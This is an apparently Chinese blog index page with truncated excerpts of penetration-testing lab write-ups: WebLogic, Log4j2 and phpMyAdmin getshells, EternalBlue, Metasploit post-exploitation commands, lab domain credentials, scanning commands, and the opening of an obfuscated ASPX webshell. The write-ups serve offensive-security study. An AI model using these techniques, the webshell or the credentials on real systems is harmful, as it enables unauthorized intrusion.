摘要:
渗透过程概述: 1、信息收集-->敏感文件泄漏-->登录后台,修改模版getshell wappalyzer识别joomla cms,JoomlaScan扫描路径和敏感文件,发现后台和配置文件configuration.php~,获取mysql连接信息并连接,从官网途径获取添加管理员的方法,登录后台 阅读全文
posted @ 2023-03-23 13:40
hello_bao
阅读(1313)
评论(0)
推荐(0)
摘要:
账号 密码 de1ay\administrator !@#QWEasd123 de1ay\mssql 1qaz@WSX de1ay\de1ay 1qaz@WSX 渗透过程概述: weblogicScanner.py 收集weblogic漏洞信息,Java反序列化漏洞利用工具V1.7 getshell 阅读全文
posted @ 2023-03-23 13:40
hello_bao
阅读(145)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->phpmyadmin日志写shell,上线msf,提权 端口扫描,root/root弱口令登录mysql,登录phpmyadmin,利用日志文件写shell。蚁剑连接,反弹shell上线msf,添加路由。 2、内网渗透-->域控 永恒之蓝,ms17_010_comm 阅读全文
posted @ 2023-03-23 13:39
hello_bao
阅读(82)
评论(0)
推荐(0)
摘要:
1、nmap -sC -sT -sV -A -O 192.168.1.103 2、dirb http://192.168.1.103 -X .php .html 递归扫描目录文件,-X参数过滤403 3、http://192.168.1.103/test.php?file=last.html 文件包 阅读全文
posted @ 2023-03-23 13:39
hello_bao
阅读(26)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->Logj2漏洞利用getshell-->docker逃逸失败 利用dnsLog验证log4j2漏洞,kali开启http和ladp服务,构造bash一句话payload,连接nc。验证docker环境,利用runC漏洞和特权模式 都逃逸失败了。 2、内网渗透-->域 阅读全文
posted @ 2023-03-23 13:38
hello_bao
阅读(488)
评论(0)
推荐(0)
摘要:
渗透过程概述: 1、信息收集-->weblogic反序列化漏洞getshell-->上线msf,提权 登录页发现weblogic版本信息,利用其反序列化漏洞,上线msf,提权,获取hash。 2、内网渗透-->sql server数据库服务器-->dc 利用永恒之蓝,win7上线msf,为保持稳定m 阅读全文
posted @ 2023-03-23 13:37
hello_bao
阅读(1798)
评论(0)
推荐(0)
摘要:
进程迁移: ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后: sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 id 阅读全文
posted @ 2023-03-23 13:32
hello_bao
阅读(183)
评论(0)
推荐(0)
摘要:
1、下载插件和服务代码 地址: https://github.com/f0ng/captcha-killer-modified/releases 该项目基于captcha-killer(https://github.com/c0ny1/captcha-killer)修改,可以用于2021-2022的 阅读全文
posted @ 2023-03-23 13:31
hello_bao
阅读(977)
评论(1)
推荐(0)
摘要:
<%@ Page Language="Jscript" Debug=true%> <% var SE=Request.Form["1"]; var SMQ="unsa",FWJVPDC="fe",PZEGHR=SMQ+FWJVPDC; function AJHB() { return SE; } f 阅读全文
posted @ 2023-03-23 13:20
hello_bao
阅读(1058)
评论(0)
推荐(0)
摘要:
1、常见端口/服务漏洞列表汇总 2、反序列化漏洞的原理 在反序列化unserialize()时存在用户可控参数,而反序列化会自动调用一些魔术方法,如果魔术方法内 存在一些敏感操作例如eval()函数,而且参数是通过反序列化产生的,那么用户就可以通过改变参数来执行敏感操作。 3、xxe漏洞的原理 允许 阅读全文
posted @ 2023-03-23 13:19
hello_bao
阅读(220)
评论(0)
推荐(0)

浙公网安备 33010602011771号